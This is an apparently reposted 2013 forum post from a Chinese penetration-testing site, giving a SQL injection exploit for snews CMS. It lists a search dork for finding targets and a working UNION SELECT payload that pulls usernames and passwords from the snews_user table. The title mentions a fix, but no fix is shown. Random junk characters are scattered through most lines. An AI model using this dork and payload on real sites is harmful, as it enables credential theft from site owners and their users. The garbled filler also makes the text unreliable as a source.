中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability. g1 w- N* a2 k" ^, d6 J: F" h; j0 `4 ^
作者: By onestree
2 l0 i' p& o- E# ^, g) Y' I+ s下载地址 : http://snewscms.com/
" p; W8 ?) Q! J* c( Y) h测试平台 : ubuntu 12.10 / win 7* H; X: Z' A: c; b( q
关键词: inurl:"tanyakan pada rumput yang bergoyang"+ _; c# G' |# D) A7 o% j6 U0 U; R5 a

" A) Q, v/ x% @, b  ^. o- s ! Q7 d: C9 _: x. G2 ~
*************************************************************, t. \1 H5 y; O1 b7 p2 c) p0 J' A
9 X- h8 {, A# R0 B* t
SQL poc:. U% P2 ?6 j/ ~; A3 g3 F$ Q6 P2 P
/ O  a5 [9 b4 m
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
3 c% g  q5 R# f6 W" \6 N! U& Z% V  N 4 L. Z) B2 N/ V. ^* O
示例
; o% f% o* ^6 K. @& I : M- O5 B8 E" ^, F) q; H: `
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
) g" M1 w' H  M! w6 N6 M" g) y ; J' L* p6 U5 g3 H6 k
# s" ?+ x$ ]2 a" F& c0 M
致谢:  i% ]* u& }6 d" E
' e1 m! D! @, ^- B. D! ?# f( @* n9 V
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell+ E9 T8 U5 W  R* v
     8 O/ M, _/ m8 B( d
          indonesiancoder - moeslimh4x0r - go-coder
1 i3 o1 S6 `5 }+ M& e! l
5 V$ {2 f! M& b1 }spesial my hunny :*% y$ ^+ z2 G0 H& K0 u$ R; t! B




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2